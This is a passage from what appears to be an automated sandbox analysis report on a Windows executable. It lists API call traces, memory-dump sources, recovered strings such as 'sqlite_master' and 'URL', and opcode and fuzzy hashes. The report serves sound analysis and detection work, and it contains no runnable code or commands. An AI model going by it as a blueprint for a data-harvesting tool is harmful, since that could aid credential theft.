                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1127616056-0
                                                                                                                                                                                    • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                                                                                                    • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                                                                                                    • memset.MSVCRT ref: 0042FED3
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                    • String ID: sqlite_master
                                                                                                                                                                                    • API String ID: 438689982-3163232059
                                                                                                                                                                                    • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                                                                                                    • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                                                                                                    • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3917621476-0
                                                                                                                                                                                    • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                                                                                                    • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                                                                                                    • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                                                    • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                                                    • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 822687973-0
                                                                                                                                                                                    • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
• Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
• Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
• Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
APIs
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,761EDF80,?,0041755F,?), ref: 00417452
• malloc.MSVCRT ref: 00417459
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,761EDF80,?,0041755F,?), ref: 00417478
• free.MSVCRT ref: 0041747F
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: ByteCharMultiWide$freemalloc
• String ID:
• API String ID: 2605342592-0
• Opcode ID: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
• Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
• Opcode Fuzzy Hash: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
• Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
• RegisterClassW.USER32(00000001), ref: 00412428
• GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
• CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: HandleModule$ClassCreateRegisterWindow
• String ID:
• API String ID: 2678498856-0
• Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
• Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
• Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
• Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
APIs
• GetDlgItem.USER32(?,?), ref: 00409B40
• SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
• SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
• SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: MessageSend$Item
• String ID:
• API String ID: 3888421826-0
• Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
• Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
• Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
• Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
APIs
• memset.MSVCRT ref: 00417B7B
• UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
• LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
• GetLastError.KERNEL32 ref: 00417BB5
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: File$ErrorLastLockUnlockmemset
• String ID:
• API String ID: 3727323765-0
• Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
• Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
• Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
• Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
APIs
• memset.MSVCRT ref: 0040F673
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
• strlen.MSVCRT ref: 0040F6A2
• WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: ByteCharFileMultiWideWritememsetstrlen
• String ID:
• API String ID: 2754987064-0
• Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
• Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
• Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
• Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
APIs
• memset.MSVCRT ref: 0040F6E2
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
• strlen.MSVCRT ref: 0040F70D
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: ByteCharFileMultiWideWritememsetstrlen
• String ID:
• API String ID: 2754987064-0
• Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
• Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
• Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
• Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
APIs
• memset.MSVCRT ref: 00402FD7
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
• strlen.MSVCRT ref: 00403006
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: ByteCharFileMultiWideWritememsetstrlen
• String ID:
• API String ID: 2754987064-0
• Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
• Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
• Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
• Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
APIs
  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
• SetBkMode.GDI32(?,00000001), ref: 004143A2
• SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
• SetTextColor.GDI32(?,00C00000), ref: 004143BE
• GetStockObject.GDI32(00000000), ref: 004143C6
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
• String ID:
• API String ID: 764393265-0
• Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
• Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
• Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
• Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
APIs
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
• SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
• SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 979780441-0
                                                                                                                                                                                    • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                    • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                                                                    • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                                                                                    • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                                                    • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1386444988-0
                                                                                                                                                                                    • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                    • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                                                                    • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                    • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InvalidateMessageRectSend
                                                                                                                                                                                    • String ID: d=E
                                                                                                                                                                                    • API String ID: 909852535-3703654223
                                                                                                                                                                                    • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                                                                                                    • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                                                      • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                                                      • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcschr$memcpywcslen
                                                                                                                                                                                    • String ID: "
                                                                                                                                                                                    • API String ID: 1983396471-123907689
                                                                                                                                                                                    • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                                                                                                    • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                                                    • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                    • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                                                    • String ID: URL
                                                                                                                                                                                    • API String ID: 2108176848-3574463123
                                                                                                                                                                                    • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                    • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                    • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _snwprintfmemcpy
                                                                                                                                                                                    • String ID: %2.2X
                                                                                                                                                                                    • API String ID: 2789212964-323797159
                                                                                                                                                                                    • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                                                                                                    • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                                                    • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                                                                                                    • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _snwprintf
                                                                                                                                                                                    • String ID: %%-%d.%ds
                                                                                                                                                                                    • API String ID: 3988819677-2008345750
                                                                                                                                                                                    • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                                                                                                    • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                                                                                                    • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                                                                                                                                                                    • memset.MSVCRT ref: 00401917
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PlacementWindowmemset
                                                                                                                                                                                    • String ID: WinPos
                                                                                                                                                                                    • API String ID: 4036792311-2823255486
                                                                                                                                                                                    • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                                                                                                    • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                                                                    • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                                                                                                    • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
APIs
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
• wcsrchr.MSVCRT ref: 0040DCE9
• wcscat.MSVCRT ref: 0040DCFF
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: FileModuleNamewcscatwcsrchr
• String ID: _lng.ini
• API String ID: 383090722-1948609170
• Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
• Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
• Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
• Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
